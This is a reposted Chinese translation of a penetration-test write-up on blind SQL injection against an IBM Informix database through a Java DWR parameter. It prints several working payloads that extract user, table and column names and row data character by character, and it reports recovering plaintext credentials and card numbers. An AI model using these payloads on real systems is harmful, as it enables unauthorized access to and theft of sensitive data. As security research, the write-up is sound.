Informix数据库SQL注入实战

在最近的应用程序渗透测试中,我发现一个有意思的sql漏洞(SQLI中)。

成都创新互联公司专业为企业提供兰西网站建设、兰西做网站、兰西网站设计、兰西网站制作等企业网站建设、网页设计与制作、兰西企业网站模板建站服务,十载兰西做网站经验,不只是建网站,更提供有价值的思路和整体网络服务。

SQLI出现这种情况的原因:

1.开发中带来的问题

2.数据库正在使用

下面,我来介绍我遇到的问题以及如何解决并dump数据库。该应用程序使用一种名为DWR后端的JAVA远程调用框架,系统调用是这样的:

这是位于C0-param1的参数,从表面上看起来很容易,因为它给了详细的错误信息,当一个单引号被添加到参数尾部时,会得到以下错误信息:“java.sql.SQLException: A syntax error has occurred.”(语法错误)

c0-param1参数控制有多少结果从数据库中检索出来,这注射点出现在类似于mssql的TOP keyword位置和MYSQL的Limit。我认为SQLI跑MSSQL库比MYSQL更合适。我添加一系列请求如下图所示:

执行查询后,得到一个错误信息:“java.sql.SQLException: The column (card_no) must be in the GROUP BY list.”数据库系统是IBM的Informix,我对Informix了解甚少,所以还得一个函数一个函数地查IBM的文档。

现在知道这是Informix,能帮助我们对次注射是怎么产生的,第一个子句,类似TOP和LIMIT,查询起来是这样的:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID = 1), 1, 1) = 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

如果条件为真(即当前用户名的第一个字母为'a'),查询将返回结果,反则会报错,因为子查询(SELECT 1 FROM SYSTABLES)会返回多个结果。然而,又有难题了,不能使用等号,通过替换,使用以下语句:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

有了这些注射知识和概念就好整多了,掏出sqlmap(从我的同事那里弄到了些小技巧,而且观摩了他的帖子“Sqlmap的高级注入技巧”),Sqlmap的确是很好的工具,作者是今年在大会上认识的一个很不错的家伙写的。。。好像跑题了。不过遗憾的是,Sqlmap不支持Informix,所以我不得不自己写工具了:

获取表名的长度:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2)) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取表名:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取有表中有多少列:

c0-param1=string:10 (CASE WHEN (SELECT NCOLS FROM SYSTABLES WHERE TABID > 0 AND TABID < 2) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取列名长度:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2))) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取列名:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2)), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

通过一个小研究,我发现Informix的表实际上有一个隐藏很深的列名:ROWID,每一行都存在一个这样的序列号。然而,这些ROWID可以分散,删除或插入到表。为了找到包含数据的ROWID,我调用一个名为NVL的函数,这个函数可以返回不同的结果,具体取决于第一个参数是否为NULL。最终找到一处可能总是包含数据的一列,语句:

c0-param1=string:10 (NVL((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 2), (SELECT 1 FROM SYSTABLES))),

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 1), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

通过这种方法,能够发现纯文本应用程序凭据,明文银行SFTP凭证和未加密的支付卡号码。

随着这一成功,明白了以前对Informix数据库想知道的。

原文地址:http://blog.spiderlabs.com/2013/12/the-case-of-an-obscure-injection.html

文章名称:Informix数据库SQL注入实战
转载源于:http://www.shufengxianlan.com/qtweb/news46/290246.html

网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联